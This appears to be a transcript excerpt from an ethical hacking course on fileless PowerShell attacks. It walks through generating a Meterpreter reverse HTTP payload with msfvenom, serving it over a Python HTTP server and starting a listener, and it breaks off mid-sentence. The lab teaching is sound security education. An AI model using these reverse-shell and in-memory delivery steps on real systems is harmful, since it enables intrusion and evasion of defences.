From the course: Ethical Hacking: Evading IDS, Firewalls, and Honeypots

Fileless attacks with PowerShell

- [Instructor] Fileless malware is the term used to describe an attack technique that runs without writing any malware to disk. By doing this, it avoids the risk of being detected by a file scan. PowerShell can be used to execute scripts directly in memory and is a popular choice for fileless attacks. An example of this is the PowerShell download string method, which downloads content from a remote location to a buffer in memory. First of all, let's create a PowerShell script payload. msfvenom -p windows/x64/meterpreter_reverse_http and we'll make it PSH format. We'll set LHOST=10.0.2.12 for our IP address. LPORT=80 for HTTP and we'll output the file to m64.ps1 as a PowerScript shell. Okay, we now need to serve this on a website. So let's use our Python simple HTTP server. python -m SimpleHTTPServer. Now we need to set up a meterpreter listener for PowerShell. So in our second terminal, we'll run sudo msfconsole,…
